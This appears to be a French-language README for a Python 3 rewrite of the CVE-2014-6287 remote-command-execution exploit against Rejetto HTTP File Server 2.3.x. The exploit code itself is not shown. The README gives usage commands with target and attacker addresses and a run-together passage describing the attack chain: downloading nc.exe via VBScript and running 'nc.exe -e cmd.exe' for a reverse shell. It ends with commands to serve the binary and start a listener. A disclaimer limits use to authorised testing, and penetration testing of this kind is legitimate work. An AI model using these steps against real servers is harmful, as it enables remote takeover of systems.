
Exploit d'exécution de commandes à distance pour Rejetto HTTP File Server 2.3.x (CVE-2014-6287) réécrit en Python 3 pour les tests de sécurité offensive modernes.
Il s'agit d'une réécriture en Python 3 de l'exploit classique d'exécution de commandes à distance (RCE) ciblant Rejetto HTTP File Server (HFS) v2.3.x, exploitant la vulnérabilité identifiée sous le nom de CVE-2014-6287.
Découvert à l'origine par Avinash Kumar Thapa alias « -Acid », cette version améliore la portabilité et la convivialité, en offrant une paramétrisation complète et une compatibilité moderne.
Cet outil est fourni exclusivement à des fins éducatives et de tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.
nc.exenc.exe à l'aide de VBScriptnc.exenc.exe -e cmd.exe pour établir le reverse shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444